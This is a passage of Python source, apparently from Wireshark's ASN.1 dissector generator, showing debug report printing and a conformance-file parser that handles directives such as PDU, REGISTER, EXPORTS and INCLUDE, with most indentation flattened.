print("%-49s %-24s %-24s" % (t, self.type[t]['tname'], self.type[t]['ethname']))
print("\n# Wireshark Types")
print("Wireshark type References (ASN.1 types)")
print("-" * 100)
for t in self.eth_type_ord:
sys.stdout.write("%-31s %d" % (t, len(self.eth_type[t]['ref'])))
print(', '.join(self.eth_type[t]['ref']))
print("\n# ASN.1 Values")
print("%-40s %-18s %-20s %s" % ("ASN.1 unique name", "Type", "Value", "Wireshark value"))
print("-" * 100)
for v in self.value_ord:
vv = self.value[v]['value']
if isinstance (vv, Value):
vv = vv.to_str(self)
print("%-40s %-18s %-20s %s" % (v, self.value[v]['type'].eth_tname(), vv, self.value[v]['ethname']))
#print "\n# Wireshark Values"
#print "%-40s %s" % ("Wireshark name", "Value")
#print "-" * 100
#for v in self.eth_value_ord:
# vv = self.eth_value[v]['value']
# if isinstance (vv, Value):
# vv = vv.to_str(self)
# print "%-40s %s" % (v, vv)
print("\n# ASN.1 Fields")
print("ASN.1 unique name Wireshark name ASN.1 type")
print("-" * 100)
for f in (self.pdu_ord + self.field_ord):
print("%-40s %-20s %s" % (f, self.field[f]['ethname'], self.field[f]['type']))
print("\n# Wireshark Fields")
print("Wireshark name Wireshark type References (ASN.1 fields)")
print("-" * 100)
for f in (self.eth_hfpdu_ord + self.eth_hf_ord):
sys.stdout.write("%-30s %-20s %s" % (f, self.eth_hf[f]['ethtype'], len(self.eth_hf[f]['ref'])))
print(', '.join(self.eth_hf[f]['ref']))
#print "\n# Order after dependencies"
#print '\n'.join(self.eth_type_ord1)
print("\n# Cyclic dependencies")
for c in self.eth_dep_cycle:
print(' -> '.join(c))
self.dupl_report()
self.output.outnm = self.outnm_opt
if (not self.output.outnm):
self.output.outnm = self.proto
self.output.outnm = self.output.outnm.replace('.', '-')
if not self.justexpcnf:
self.eth_output_hf()
self.eth_output_ett()
self.eth_output_types()
self.eth_output_hf_arr()
self.eth_output_ett_arr()
self.eth_output_export()
self.eth_output_val()
self.eth_output_valexp()
self.eth_output_dis_hnd()
self.eth_output_dis_reg()
self.eth_output_dis_tab()
self.eth_output_syn_reg()
self.eth_output_tables()
if self.expcnf:
self.eth_output_expcnf()
def dbg_modules(self):
def print_mod(m):
sys.stdout.write("%-30s " % (m))
dep = self.module[m][:]
for i in range(len(dep)):
if dep[i] not in self.module:
dep[i] = '*' + dep[i]
print(', '.join(dep))
# end of print_mod()
(mod_ord, mod_cyc) = dependency_compute(self.module_ord, self.module, ignore_fn = lambda t: t not in self.module)
print("\n# ASN.1 Moudules")
print("Module name Dependency")
print("-" * 100)
new_ord = False
for m in (self.module_ord):
print_mod(m)
new_ord = new_ord or (self.module_ord.index(m) != mod_ord.index(m))
if new_ord:
print("\n# ASN.1 Moudules - in dependency order")
print("Module name Dependency")
print("-" * 100)
for m in (mod_ord):
print_mod(m)
if mod_cyc:
print("\nCyclic dependencies:")
for i in (list(range(len(mod_cyc)))):
print("%02d: %s" % (i + 1, str(mod_cyc[i])))
#--- EthCnf -------------------------------------------------------------------
class EthCnf:
def __init__(self):
self.ectx = None
self.tblcfg = {}
self.table = {}
self.order = {}
self.fn = {}
self.report = {}
self.suppress_line = False
self.include_path = []
# Value name Default value Duplicity check Usage check
self.tblcfg['EXPORTS'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['MAKE_ENUM'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['USE_VALS_EXT'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['PDU'] = { 'val_nm' : 'attr', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['SYNTAX'] = { 'val_nm' : 'attr', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['REGISTER'] = { 'val_nm' : 'attr', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['USER_DEFINED'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['NO_EMIT'] = { 'val_nm' : 'flag', 'val_dflt' : 0, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['MODULE'] = { 'val_nm' : 'proto', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['OMIT_ASSIGNMENT'] = { 'val_nm' : 'omit', 'val_dflt' : False, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['NO_OMIT_ASSGN'] = { 'val_nm' : 'omit', 'val_dflt' : True, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['VIRTUAL_ASSGN'] = { 'val_nm' : 'name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['SET_TYPE'] = { 'val_nm' : 'type', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['TYPE_RENAME'] = { 'val_nm' : 'eth_name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['FIELD_RENAME'] = { 'val_nm' : 'eth_name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['IMPORT_TAG'] = { 'val_nm' : 'ttag', 'val_dflt' : (), 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['FN_PARS'] = { 'val_nm' : 'pars', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['TYPE_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['ETYPE_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : False }
self.tblcfg['FIELD_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['EFIELD_ATTR'] = { 'val_nm' : 'attr', 'val_dflt' : {}, 'chk_dup' : True, 'chk_use' : True }
self.tblcfg['ASSIGNED_ID'] = { 'val_nm' : 'ids', 'val_dflt' : {}, 'chk_dup' : False,'chk_use' : False }
self.tblcfg['ASSIGN_VALUE_TO_TYPE'] = { 'val_nm' : 'name', 'val_dflt' : None, 'chk_dup' : True, 'chk_use' : True }
for k in list(self.tblcfg.keys()) :
self.table[k] = {}
self.order[k] = []
def add_item(self, table, key, fn, lineno, **kw):
if self.tblcfg[table]['chk_dup'] and key in self.table[table]:
warnings.warn_explicit("Duplicated %s for %s. Previous one is at %s:%d" %
(table, key, self.table[table][key]['fn'], self.table[table][key]['lineno']),
UserWarning, fn, lineno)
return
self.table[table][key] = {'fn' : fn, 'lineno' : lineno, 'used' : False}
self.table[table][key].update(kw)
self.order[table].append(key)
def update_item(self, table, key, fn, lineno, **kw):
if key not in self.table[table]:
self.table[table][key] = {'fn' : fn, 'lineno' : lineno, 'used' : False}
self.order[table].append(key)
self.table[table][key][self.tblcfg[table]['val_nm']] = {}
self.table[table][key][self.tblcfg[table]['val_nm']].update(kw[self.tblcfg[table]['val_nm']])
def get_order(self, table):
return self.order[table]
def check_item(self, table, key):
return key in self.table[table]
def copy_item(self, table, dst_key, src_key):
if (src_key in self.table[table]):
self.table[table][dst_key] = self.table[table][src_key]
def check_item_value(self, table, key, **kw):
return key in self.table[table] and kw.get('val_nm', self.tblcfg[table]['val_nm']) in self.table[table][key]
def use_item(self, table, key, **kw):
vdflt = kw.get('val_dflt', self.tblcfg[table]['val_dflt'])
if key not in self.table[table]: return vdflt
vname = kw.get('val_nm', self.tblcfg[table]['val_nm'])
#print "use_item() - set used for %s %s" % (table, key)
self.table[table][key]['used'] = True
return self.table[table][key].get(vname, vdflt)
def omit_assignment(self, type, ident, module):
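        """Decide whether the assignment 'ident' is to be omitted.

        Besides the plain identifier, wildcard OMIT_ASSIGNMENT keys are
        honoured: '*', '*T'/'*V'/'*C' (all type/value/class assignments)
        and '/module'-suffixed forms such as (illustrative) '*T/MyModule'.
        A wildcard match can still be overridden per identifier through
        NO_OMIT_ASSGN.
        """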
if self.ectx.conform.use_item('OMIT_ASSIGNMENT', ident):
return True
if self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*') or \
self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*'+type) or \
self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*/'+module) or \
self.ectx.conform.use_item('OMIT_ASSIGNMENT', '*'+type+'/'+module):
return self.ectx.conform.use_item('NO_OMIT_ASSGN', ident)
return False
def add_fn_line(self, name, ctx, line, fn, lineno):
if name not in self.fn:
self.fn[name] = {'FN_HDR' : None, 'FN_FTR' : None, 'FN_BODY' : None}
if (self.fn[name][ctx]):
self.fn[name][ctx]['text'] += line
else:
self.fn[name][ctx] = {'text' : line, 'used' : False,
'fn' : fn, 'lineno' : lineno}
def get_fn_presence(self, name):
#print "get_fn_presence('%s'):%s" % (name, str(self.fn.has_key(name)))
#if self.fn.has_key(name): print self.fn[name]
return name in self.fn
def get_fn_body_presence(self, name):
return name in self.fn and self.fn[name]['FN_BODY']
def get_fn_text(self, name, ctx):
if (name not in self.fn):
            return ''
        if (not self.fn[name][ctx]):
            return ''
        self.fn[name][ctx]['used'] = True
        out = self.fn[name][ctx]['text']
        if (not self.suppress_line):
            out = '#line %u "%s"\n%s\n' % (self.fn[name][ctx]['lineno'], rel_dissector_path(self.fn[name][ctx]['fn']), out)
return out
def add_pdu(self, par, is_new, fn, lineno):
#print "add_pdu(par=%s, %s, %d)" % (str(par), fn, lineno)
(reg, hidden) = (None, False)
if (len(par) > 1): reg = par[1]
if (reg and reg[0]=='@'): (reg, hidden) = (reg[1:], True)
attr = {'new' : is_new, 'reg' : reg, 'hidden' : hidden, 'need_decl' : False, 'export' : False}
self.add_item('PDU', par[0], attr=attr, fn=fn, lineno=lineno)
return
def add_syntax(self, par, fn, lineno):
#print "add_syntax(par=%s, %s, %d)" % (str(par), fn, lineno)
        if (len(par) >= 2):
name = par[1]
else:
name = '"'+par[0]+'"'
attr = { 'pdu' : par[0] }
self.add_item('SYNTAX', name, attr=attr, fn=fn, lineno=lineno)
return
def add_register(self, pdu, par, fn, lineno):
#print "add_register(pdu=%s, par=%s, %s, %d)" % (pdu, str(par), fn, lineno)
if (par[0] in ('N', 'NUM')): rtype = 'NUM'; (pmin, pmax) = (2, 2)
elif (par[0] in ('S', 'STR')): rtype = 'STR'; (pmin, pmax) = (2, 2)
elif (par[0] in ('B', 'BER')): rtype = 'BER'; (pmin, pmax) = (1, 2)
elif (par[0] in ('P', 'PER')): rtype = 'PER'; (pmin, pmax) = (1, 2)
else: warnings.warn_explicit("Unknown registration type '%s'" % (par[2]), UserWarning, fn, lineno); return
if ((len(par)-1) < pmin):
warnings.warn_explicit("Too few parameters for %s registration type. At least %d parameters are required" % (rtype, pmin), UserWarning, fn, lineno)
return
if ((len(par)-1) > pmax):
warnings.warn_explicit("Too many parameters for %s registration type. Only %d parameters are allowed" % (rtype, pmax), UserWarning, fn, lineno)
attr = {'pdu' : pdu, 'rtype' : rtype}
if (rtype in ('NUM', 'STR')):
attr['rtable'] = par[1]
attr['rport'] = par[2]
rkey = '/'.join([rtype, attr['rtable'], attr['rport']])
elif (rtype in ('BER', 'PER')):
attr['roid'] = par[1]
attr['roidname'] = '""'
if (len(par)>=3):
attr['roidname'] = par[2]
elif attr['roid'][0] != '"':
attr['roidname'] = '"' + attr['roid'] + '"'
rkey = '/'.join([rtype, attr['roid']])
self.add_item('REGISTER', rkey, attr=attr, fn=fn, lineno=lineno)
def check_par(self, par, pmin, pmax, fn, lineno):
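        """Normalize a parameter list parsed from a conformance line.

        A '-' token becomes None (placeholder) and a token starting with
        '#' ends the list (inline comment).  Illustrative example:
        ['A', '-', '#rest', 'B'] with pmin=1, pmax=-1 yields ['A', None].
        Returns None when fewer than pmin parameters remain.
        """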
for i in range(len(par)):
if par[i] == '-':
par[i] = None
continue
if par[i][0] == '#':
par[i:] = []
break
if len(par) < pmin:
warnings.warn_explicit("Too few parameters. At least %d parameters are required" % (pmin), UserWarning, fn, lineno)
return None
if (pmax >= 0) and (len(par) > pmax):
warnings.warn_explicit("Too many parameters. Only %d parameters are allowed" % (pmax), UserWarning, fn, lineno)
return par[0:pmax]
return par
def read(self, fn):
def get_par(line, pmin, pmax, fn, lineno):
par = line.split(None, pmax)
par = self.check_par(par, pmin, pmax, fn, lineno)
return par
def get_par_nm(line, pmin, pmax, fn, lineno):
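            """Parse positional parameters followed by NAME = value pairs.

            Illustrative example, with pmin=1 and pmax=1:
            'hf_index TYPE = FT_UINT32 DISPLAY = BASE_DEC' yields
            ['hf_index', {'TYPE': 'FT_UINT32', 'DISPLAY': 'BASE_DEC'}].
            """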
if pmax:
par = line.split(None, pmax)
else:
par = [line,]
for i in range(len(par)):
if par[i][0] == '#':
par[i:] = []
break
if len(par) < pmin:
warnings.warn_explicit("Too few parameters. At least %d parameters are required" % (pmin), UserWarning, fn, lineno)
return None
if len(par) > pmax:
nmpar = par[pmax]
else:
nmpar = ''
nmpars = {}
nmpar_first = re.compile(r'^\s*(?P<attr>[_A-Z][_A-Z0-9]*)\s*=\s*')
nmpar_next = re.compile(r'\s+(?P<attr>[_A-Z][_A-Z0-9]*)\s*=\s*')
nmpar_end = re.compile(r'\s*$')
result = nmpar_first.search(nmpar)
pos = 0
while result:
k = result.group('attr')
pos = result.end()
result = nmpar_next.search(nmpar, pos)
p1 = pos
if result:
p2 = result.start()
else:
p2 = nmpar_end.search(nmpar, pos).start()
v = nmpar[p1:p2]
nmpars[k] = v
if len(par) > pmax:
par[pmax] = nmpars
return par
f = open(fn, "r")
lineno = 0
is_import = False
directive = re.compile(r'^\s*#\.(?P<name>[A-Z_][A-Z_0-9]*)(\s+|$)')
cdirective = re.compile(r'^\s*##')
report = re.compile(r'^TABLE(?P<num>\d*)_(?P<type>HDR|BODY|FTR)$')
comment = re.compile(r'^\s*#[^.#]')
empty = re.compile(r'^\s*$')
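        # Illustrative conformance-file lines matched by the patterns above:
        #   #.PDU            -> 'directive' (name = 'PDU')
        #   #.TABLE01_BODY   -> 'directive' whose name also matches 'report'
        #   ## text          -> 'cdirective' (inside FN_* bodies; kept as '# text')
        #   # plain comment  -> 'comment' (skipped)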
ctx = None
name = ''
default_flags = 0x00
stack = []
while True:
if not f.closed:
line = f.readline()
lineno += 1
else:
line = None
if not line:
if not f.closed:
f.close()
if stack:
frec = stack.pop()
fn, f, lineno, is_import = frec['fn'], frec['f'], frec['lineno'], frec['is_import']
continue
else:
break
if comment.search(line): continue
result = directive.search(line)
if result: # directive
rep_result = report.search(result.group('name'))
if result.group('name') == 'END_OF_CNF':
f.close()
elif result.group('name') == 'OPT':
ctx = result.group('name')
par = get_par(line[result.end():], 0, -1, fn=fn, lineno=lineno)
if not par: continue
self.set_opt(par[0], par[1:], fn, lineno)
ctx = None
elif result.group('name') in ('PDU', 'PDU_NEW', 'REGISTER', 'REGISTER_NEW',
'MODULE', 'MODULE_IMPORT',
'OMIT_ASSIGNMENT', 'NO_OMIT_ASSGN',
'VIRTUAL_ASSGN', 'SET_TYPE', 'ASSIGN_VALUE_TO_TYPE',
'TYPE_RENAME', 'FIELD_RENAME', 'TF_RENAME', 'IMPORT_TAG',
'TYPE_ATTR', 'ETYPE_ATTR', 'FIELD_ATTR', 'EFIELD_ATTR',
'SYNTAX', 'SYNTAX_NEW'):
ctx = result.group('name')
elif result.group('name') in ('OMIT_ALL_ASSIGNMENTS', 'OMIT_ASSIGNMENTS_EXCEPT',
'OMIT_ALL_TYPE_ASSIGNMENTS', 'OMIT_TYPE_ASSIGNMENTS_EXCEPT',
'OMIT_ALL_VALUE_ASSIGNMENTS', 'OMIT_VALUE_ASSIGNMENTS_EXCEPT'):
ctx = result.group('name')
key = '*'
if ctx in ('OMIT_ALL_TYPE_ASSIGNMENTS', 'OMIT_TYPE_ASSIGNMENTS_EXCEPT'):
key += 'T'
if ctx in ('OMIT_ALL_VALUE_ASSIGNMENTS', 'OMIT_VALUE_ASSIGNMENTS_EXCEPT'):
key += 'V'
par = get_par(line[result.end():], 0, 1, fn=fn, lineno=lineno)
if par:
key += '/' + par[0]
self.add_item('OMIT_ASSIGNMENT', key, omit=True, fn=fn, lineno=lineno)
if ctx in ('OMIT_ASSIGNMENTS_EXCEPT', 'OMIT_TYPE_ASSIGNMENTS_EXCEPT', 'OMIT_VALUE_ASSIGNMENTS_EXCEPT'):
ctx = 'NO_OMIT_ASSGN'
else:
ctx = None
elif result.group('name') in ('EXPORTS', 'MODULE_EXPORTS', 'USER_DEFINED', 'NO_EMIT'):
ctx = result.group('name')
default_flags = EF_TYPE|EF_VALS
if ctx == 'MODULE_EXPORTS':
ctx = 'EXPORTS'
default_flags |= EF_MODULE
if ctx == 'EXPORTS':
par = get_par(line[result.end():], 0, 5, fn=fn, lineno=lineno)
else:
par = get_par(line[result.end():], 0, 1, fn=fn, lineno=lineno)
if not par: continue
p = 1
if (par[0] == 'WITH_VALS'): default_flags |= EF_TYPE|EF_VALS
                elif (par[0] == 'WITHOUT_VALS'): default_flags |= EF_TYPE; default_flags &= ~EF_VALS
elif (par[0] == 'ONLY_VALS'): default_flags &= ~EF_TYPE; default_flags |= EF_VALS
elif (ctx == 'EXPORTS'): p = 0
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[0]), UserWarning, fn, lineno)
for i in range(p, len(par)):
if (par[i] == 'ONLY_ENUM'): default_flags &= ~(EF_TYPE|EF_VALS); default_flags |= EF_ENUM
elif (par[i] == 'WITH_ENUM'): default_flags |= EF_ENUM
elif (par[i] == 'VALS_WITH_TABLE'): default_flags |= EF_TABLE
elif (par[i] == 'WS_DLL'): default_flags |= EF_WS_DLL
elif (par[i] == 'EXTERN'): default_flags |= EF_EXTERN
elif (par[i] == 'NO_PROT_PREFIX'): default_flags |= EF_NO_PROT
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
elif result.group('name') in ('MAKE_ENUM', 'MAKE_DEFINES'):
ctx = result.group('name')
default_flags = EF_ENUM
if ctx == 'MAKE_ENUM': default_flags |= EF_NO_PROT|EF_NO_TYPE
if ctx == 'MAKE_DEFINES': default_flags |= EF_DEFINE|EF_UCASE|EF_NO_TYPE
par = get_par(line[result.end():], 0, 3, fn=fn, lineno=lineno)
for i in range(0, len(par)):
if (par[i] == 'NO_PROT_PREFIX'): default_flags |= EF_NO_PROT
elif (par[i] == 'PROT_PREFIX'): default_flags &= ~ EF_NO_PROT
elif (par[i] == 'NO_TYPE_PREFIX'): default_flags |= EF_NO_TYPE
elif (par[i] == 'TYPE_PREFIX'): default_flags &= ~ EF_NO_TYPE
elif (par[i] == 'UPPER_CASE'): default_flags |= EF_UCASE
elif (par[i] == 'NO_UPPER_CASE'): default_flags &= ~EF_UCASE
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
elif result.group('name') == 'USE_VALS_EXT':
ctx = result.group('name')
default_flags = 0xFF
elif result.group('name') == 'FN_HDR':
minp = 1
if (ctx in ('FN_PARS',)) and name: minp = 0
par = get_par(line[result.end():], minp, 1, fn=fn, lineno=lineno)
if (not par) and (minp > 0): continue
ctx = result.group('name')
if par: name = par[0]
elif result.group('name') == 'FN_FTR':
minp = 1
if (ctx in ('FN_PARS','FN_HDR')) and name: minp = 0
par = get_par(line[result.end():], minp, 1, fn=fn, lineno=lineno)
if (not par) and (minp > 0): continue
ctx = result.group('name')
if par: name = par[0]
elif result.group('name') == 'FN_BODY':
par = get_par_nm(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
ctx = result.group('name')
name = par[0]
if len(par) > 1:
self.add_item('FN_PARS', name, pars=par[1], fn=fn, lineno=lineno)
elif result.group('name') == 'FN_PARS':
par = get_par_nm(line[result.end():], 0, 1, fn=fn, lineno=lineno)
ctx = result.group('name')
if not par:
name = None
elif len(par) == 1:
name = par[0]
self.add_item(ctx, name, pars={}, fn=fn, lineno=lineno)
elif len(par) > 1:
self.add_item(ctx, par[0], pars=par[1], fn=fn, lineno=lineno)
ctx = None
elif result.group('name') == 'CLASS':
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
ctx = result.group('name')
name = par[0]
add_class_ident(name)
if not name.split('$')[-1].isupper():
warnings.warn_explicit("No lower-case letters shall be included in information object class name (%s)" % (name),
UserWarning, fn, lineno)
elif result.group('name') == 'ASSIGNED_OBJECT_IDENTIFIER':
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.update_item('ASSIGNED_ID', 'OBJECT_IDENTIFIER', ids={par[0] : par[0]}, fn=fn, lineno=lineno)
elif rep_result: # Reports
num = rep_result.group('num')
type = rep_result.group('type')
if type == 'BODY':
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par: continue
else:
par = get_par(line[result.end():], 0, 0, fn=fn, lineno=lineno)
rep = { 'type' : type, 'var' : None, 'text' : '', 'fn' : fn, 'lineno' : lineno }
if len(par) > 0:
rep['var'] = par[0]
self.report.setdefault(num, []).append(rep)
ctx = 'TABLE'
name = num
elif result.group('name') in ('INCLUDE', 'IMPORT') :
is_imp = result.group('name') == 'IMPORT'
par = get_par(line[result.end():], 1, 1, fn=fn, lineno=lineno)
if not par:
warnings.warn_explicit("%s requires parameter" % (result.group('name'),), UserWarning, fn, lineno)
continue
fname = par[0]
#print "Try include: %s" % (fname)
if (not os.path.exists(fname)):
fname = os.path.join(os.path.split(fn)[0], par[0])
#print "Try include: %s" % (fname)
i = 0
while not os.path.exists(fname) and (i < len(self.include_path)):
fname = os.path.join(self.include_path[i], par[0])
#print "Try include: %s" % (fname)
i += 1
if (not os.path.exists(fname)):
if is_imp:
continue # just ignore
else:
fname = par[0] # report error
fnew = open(fname, "r")
stack.append({'fn' : fn, 'f' : f, 'lineno' : lineno, 'is_import' : is_import})
fn, f, lineno, is_import = par[0], fnew, 0, is_imp
elif result.group('name') == 'END':
ctx = None
else:
warnings.warn_explicit("Unknown directive '%s'" % (result.group('name')), UserWarning, fn, lineno)
continue
if not ctx:
if not empty.match(line):
warnings.warn_explicit("Non-empty line in empty context", UserWarning, fn, lineno)
elif ctx == 'OPT':
if empty.match(line): continue
par = get_par(line, 1, -1, fn=fn, lineno=lineno)
if not par: continue
self.set_opt(par[0], par[1:], fn, lineno)
elif ctx in ('EXPORTS', 'USER_DEFINED', 'NO_EMIT'):
if empty.match(line): continue
if ctx == 'EXPORTS':
par = get_par(line, 1, 6, fn=fn, lineno=lineno)
else:
par = get_par(line, 1, 2, fn=fn, lineno=lineno)
if not par: continue
flags = default_flags
p = 2
if (len(par)>=2):
if (par[1] == 'WITH_VALS'): flags |= EF_TYPE|EF_VALS
                    elif (par[1] == 'WITHOUT_VALS'): flags |= EF_TYPE; flags &= ~EF_VALS
elif (par[1] == 'ONLY_VALS'): flags &= ~EF_TYPE; flags |= EF_VALS
elif (ctx == 'EXPORTS'): p = 1
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[1]), UserWarning, fn, lineno)
for i in range(p, len(par)):
if (par[i] == 'ONLY_ENUM'): flags &= ~(EF_TYPE|EF_VALS); flags |= EF_ENUM
elif (par[i] == 'WITH_ENUM'): flags |= EF_ENUM
elif (par[i] == 'VALS_WITH_TABLE'): flags |= EF_TABLE
elif (par[i] == 'WS_DLL'): flags |= EF_WS_DLL
elif (par[i] == 'EXTERN'): flags |= EF_EXTERN
elif (par[i] == 'NO_PROT_PREFIX'): flags |= EF_NO_PROT
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
self.add_item(ctx, par[0], flag=flags, fn=fn, lineno=lineno)
elif ctx in ('MAKE_ENUM', 'MAKE_DEFINES'):
if empty.match(line): continue
par = get_par(line, 1, 4, fn=fn, lineno=lineno)
if not par: continue
flags = default_flags
for i in range(1, len(par)):
if (par[i] == 'NO_PROT_PREFIX'): flags |= EF_NO_PROT
elif (par[i] == 'PROT_PREFIX'): flags &= ~ EF_NO_PROT
elif (par[i] == 'NO_TYPE_PREFIX'): flags |= EF_NO_TYPE
elif (par[i] == 'TYPE_PREFIX'): flags &= ~ EF_NO_TYPE
elif (par[i] == 'UPPER_CASE'): flags |= EF_UCASE
elif (par[i] == 'NO_UPPER_CASE'): flags &= ~EF_UCASE
else: warnings.warn_explicit("Unknown parameter value '%s'" % (par[i]), UserWarning, fn, lineno)
self.add_item('MAKE_ENUM', par[0], flag=flags, fn=fn, lineno=lineno)
elif ctx == 'USE_VALS_EXT':
if empty.match(line): continue
par = get_par(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
flags = default_flags
self.add_item('USE_VALS_EXT', par[0], flag=flags, fn=fn, lineno=lineno)
elif ctx in ('PDU', 'PDU_NEW'):
if empty.match(line): continue
par = get_par(line, 1, 5, fn=fn, lineno=lineno)
if not par: continue
is_new = False
if (ctx == 'PDU_NEW'): is_new = True
self.add_pdu(par[0:2], is_new, fn, lineno)
if (len(par)>=3):
self.add_register(par[0], par[2:5], fn, lineno)
elif ctx in ('SYNTAX', 'SYNTAX_NEW'):
if empty.match(line): continue
par = get_par(line, 1, 2, fn=fn, lineno=lineno)
if not par: continue
if not self.check_item('PDU', par[0]):
is_new = False
if (ctx == 'SYNTAX_NEW'): is_new = True
self.add_pdu(par[0:1], is_new, fn, lineno)
self.add_syntax(par, fn, lineno)
elif ctx in ('REGISTER', 'REGISTER_NEW'):
if empty.match(line): continue
par = get_par(line, 3, 4, fn=fn, lineno=lineno)
if not par: continue
if not self.check_item('PDU', par[0]):
is_new = False
if (ctx == 'REGISTER_NEW'): is_new = True
self.add_pdu(par[0:1], is_new, fn, lineno)
self.add_register(par[0], par[1:4], fn, lineno)
elif ctx in ('MODULE', 'MODULE_IMPORT'):
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item('MODULE', par[0], proto=par[1], fn=fn, lineno=lineno)
elif ctx == 'IMPORT_TAG':
if empty.match(line): continue
par = get_par(line, 3, 3, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], ttag=(par[1], par[2]), fn=fn, lineno=lineno)
elif ctx == 'OMIT_ASSIGNMENT':
if empty.match(line): continue
par = get_par(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], omit=True, fn=fn, lineno=lineno)
elif ctx == 'NO_OMIT_ASSGN':
if empty.match(line): continue
par = get_par(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], omit=False, fn=fn, lineno=lineno)
elif ctx == 'VIRTUAL_ASSGN':
if empty.match(line): continue
par = get_par(line, 2, -1, fn=fn, lineno=lineno)
if not par: continue
if (len(par[1].split('/')) > 1) and not self.check_item('SET_TYPE', par[1]):
self.add_item('SET_TYPE', par[1], type=par[0], fn=fn, lineno=lineno)
self.add_item('VIRTUAL_ASSGN', par[1], name=par[0], fn=fn, lineno=lineno)
for nm in par[2:]:
self.add_item('SET_TYPE', nm, type=par[0], fn=fn, lineno=lineno)
if not par[0][0].isupper():
warnings.warn_explicit("Virtual assignment should have uppercase name (%s)" % (par[0]),
UserWarning, fn, lineno)
elif ctx == 'SET_TYPE':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
if not self.check_item('VIRTUAL_ASSGN', par[0]):
self.add_item('SET_TYPE', par[0], type=par[1], fn=fn, lineno=lineno)
if not par[1][0].isupper():
warnings.warn_explicit("Set type should have uppercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx == 'ASSIGN_VALUE_TO_TYPE':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], name=par[1], fn=fn, lineno=lineno)
elif ctx == 'TYPE_RENAME':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item('TYPE_RENAME', par[0], eth_name=par[1], fn=fn, lineno=lineno)
if not par[1][0].isupper():
warnings.warn_explicit("Type should be renamed to uppercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx == 'FIELD_RENAME':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
self.add_item('FIELD_RENAME', par[0], eth_name=par[1], fn=fn, lineno=lineno)
if not par[1][0].islower():
warnings.warn_explicit("Field should be renamed to lowercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx == 'TF_RENAME':
if empty.match(line): continue
par = get_par(line, 2, 2, fn=fn, lineno=lineno)
if not par: continue
tmpu = par[1][0].upper() + par[1][1:]
tmpl = par[1][0].lower() + par[1][1:]
self.add_item('TYPE_RENAME', par[0], eth_name=tmpu, fn=fn, lineno=lineno)
if not tmpu[0].isupper():
warnings.warn_explicit("Type should be renamed to uppercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
self.add_item('FIELD_RENAME', par[0], eth_name=tmpl, fn=fn, lineno=lineno)
if not tmpl[0].islower():
warnings.warn_explicit("Field should be renamed to lowercase name (%s)" % (par[1]),
UserWarning, fn, lineno)
elif ctx in ('TYPE_ATTR', 'ETYPE_ATTR', 'FIELD_ATTR', 'EFIELD_ATTR'):
if empty.match(line): continue
par = get_par_nm(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
self.add_item(ctx, par[0], attr=par[1], fn=fn, lineno=lineno)
elif ctx == 'FN_PARS':
if empty.match(line): continue
if name:
par = get_par_nm(line, 0, 0, fn=fn, lineno=lineno)
else:
par = get_par_nm(line, 1, 1, fn=fn, lineno=lineno)
if not par: continue
if name:
self.update_item(ctx, name, pars=par[0], fn=fn, lineno=lineno)
else:
